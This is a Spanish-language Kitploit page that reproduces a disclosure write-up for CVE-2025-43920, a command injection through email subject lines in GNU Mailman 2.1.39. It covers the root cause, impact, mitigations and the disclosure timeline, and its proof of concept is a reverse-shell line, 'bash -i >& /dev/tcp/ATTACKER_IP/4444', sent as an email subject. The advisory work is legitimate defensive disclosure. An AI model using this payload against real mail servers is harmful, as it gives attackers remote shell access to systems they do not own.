Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2025-43920 — PoC y write-up técnico para CVE-2025-43920, una inyección remota de comandos en el archivador externo de GNU Mailman 2.1.39 que permite la ejecución de código no autenticada mediante asuntos de correo manipulados. | Kitploit
Herramientas/GitHubGitHub/0nyx-my7h/cve-2025-43920
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónComando y ControlSeguridad de Correo Electrónico
GitHub0nyx-my7h/cve-2025-43920

CVE-2025-43920

PoC y write-up técnico para CVE-2025-43920, una inyección remota de comandos en el archivador externo de GNU Mailman 2.1.39 que permite la ejecución de código no autenticada mediante asuntos de correo manipulados.

Ver Repositorio
152hace 1 añoAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2025-43920: Inyección de Comandos a través del Asunto del Correo Electrónico en GNU Mailman 2.1.39 (Paquete cPanel/WHM)

Descubierto por: Firudin Davudzada y Musazada Aydan
Fecha de Divulgación: Abril de 2025
CVE ID: CVE-2025-43920
Severidad: 5.4 Medio (CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:L/I:L/A:N)
Tipo de Ataque: Remoto
Software Afectado: GNU Mailman 2.1.39 (incluido con cPanel/WHM)

Visión General

GNU Mailman 2.1.39, tal como se incluye con cPanel y WHM, es vulnerable a una falla crítica de inyección de comandos que permite a atacantes no autenticados ejecutar comandos arbitrarios del sistema operativo. La vulnerabilidad ocurre cuando un archivador externo está configurado usando PUBLIC_EXTERNAL_ARCHIVER o PRIVATE_EXTERNAL_ARCHIVER en el archivo de configuración mm_cfg.py, y la línea de asunto del correo electrónico contiene metacaracteres de shell que no se sanitizan adecuadamente. Esto puede llevar a un compromiso total del sistema, permitiendo a los atacantes establecer shells inversas, exfiltrar datos o realizar otras acciones maliciosas.

Detalles de la Vulnerabilidad

  • Tipo de Vulnerabilidad: Inyección de Comandos
  • Vendedor: GNU Mailman (GNU Mailman)
  • Versiones Afectadas: Mailman 2.1.39; probablemente afecta versiones anteriores 2.1.x (pendiente de pruebas de regresión)
  • Componentes Afectados:
    • Configuración del archivador externo (PUBLIC_EXTERNAL_ARCHIVER, PRIVATE_EXTERNAL_ARCHIVER)
    • Mailman/Handlers/ (lógica de procesamiento del asunto del correo electrónico, potencialmente incluyendo archivos como CookHeaders.py)
  • Causa Raíz: Cuando se configura un archivador externo, la línea de asunto del correo electrónico puede pasarse a un comando de shell sin la sanitización adecuada, permitiendo la ejecución de comandos arbitrarios si hay metacaracteres de shell (por ejemplo, ;, &, |).
  • Estado: No hay una solución oficial disponible. Mailman 2.1.x ha llegado al final de su vida útil (EOL); se recomienda encarecidamente migrar a Mailman 3.x.

Prueba de Concepto

Para explotar esta vulnerabilidad, un atacante puede enviar un correo electrónico a una lista gestionada por Mailman con una línea de asunto maliciosa, como:

root@kitploit:~
Subject: ;bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1

Requisitos previos:

  • La lista de Mailman objetivo debe tener un archivador externo configurado a través de PUBLIC_EXTERNAL_ARCHIVER o PRIVATE_EXTERNAL_ARCHIVER.
  • El atacante debe controlar un servidor o cliente de correo capaz de enviar a la lista objetivo.
  • Se debe configurar un listener (por ejemplo, netcat) en ATTACKERIP:4444 para recibir la shell inversa.

Resultado Esperado: Si el comando del archivador externo no sanitiza la línea de asunto, el comando malicioso se ejecuta en el servidor, estableciendo una shell inversa al servidor del atacante.

Vectores de Ataque

  • Vector Principal: Líneas de asunto de correo electrónico maliciosas que contienen metacaracteres de shell enviadas a una lista de correo gestionada por Mailman con un archivador externo configurado.
  • Escenarios de Explotación:
    • Establecer shells inversas para acceso persistente.
    • Ejecutar comandos para exfiltrar datos, modificar configuraciones o instalar malware.
    • Encadenar con otras vulnerabilidades para escalar ataques.
  • Facilidad de Explotación: Alta, ya que cualquier remitente de correo puede atacar listas públicas o mal configuradas con una configuración de archivador externo.

Impacto en la Seguridad

AspectoSeveridad
Ejecución de CódigoAlta (ejecución arbitraria de comandos del SO).
Escalada de PrivilegiosAlta (posible acceso root dependiendo de los privilegios de ejecución de Mailman).
Divulgación de InformaciónAlta (la salida del comando puede revelar datos del sistema).
Denegación de ServicioAlta (los comandos maliciosos pueden bloquear o sobrecargar el servidor).

Mitigaciones

Acciones Inmediatas

  • Deshabilitar Archivos Externos: Establezca PUBLIC_EXTERNAL_ARCHIVER y PRIVATE_EXTERNAL_ARCHIVER como None en mm_cfg.py para deshabilitar la funcionalidad de archivador externo:

    root@kitploit:~
    PUBLIC_EXTERNAL_ARCHIVER = None
    PRIVATE_EXTERNAL_ARCHIVER = None
    
  • Sanitizar Entradas: Si se requiere un archivador externo, asegúrese de que el comando sanitice la línea de asunto para evitar la inyección de metacaracteres de shell.

  • Restringir Suscripciones: Limite las suscripciones a listas de correo a usuarios de confianza para reducir la exposición.

Soluciones a Largo Plazo

  • Actualizar a Mailman 3.x: Migre a Mailman 3.x, que implementa una sanitización robusta de entradas y es mantenido activamente.
  • Deshabilitar Procesamiento de Correos: Si no es necesario, deshabilite la funcionalidad de procesamiento de correos de Mailman para eliminar el vector de ataque.
  • Endurecer el Entorno: Ejecute Mailman en un entorno contenerizado con privilegios mínimos para limitar el impacto de posibles exploits.

Cronología

  • Q1 2025: Descubierto durante una evaluación de pruebas de penetración autorizada.
  • Q1 2025: Reportado a los mantenedores de GNU Mailman y cPanel.
  • Abril de 2025: CVE asignado por MITRE.
  • Abril de 2025: Divulgación pública a través de este repositorio.

Referencias

  • Código Fuente de Mailman 2.1
  • Registro CVE-2025-43920
  • Recomendaciones de Seguridad de Mailman
  • INCIBE-CERT - CVE-2025-43920
  • VULDB - CVE-2025-43920
  • National Institute of Standards and Technology (NIST) - CVE-2025-43920
  • Tenable - CVE-2025-43920

Agradecimientos

Firudin Davudzada y Musazada Aydan divulgaron responsablemente esta vulnerabilidad durante un compromiso de pruebas de penetración autorizado. Gracias al equipo MITRE CVE por la coordinación.

Contacto

Email: [email protected]\

Descargar herramienta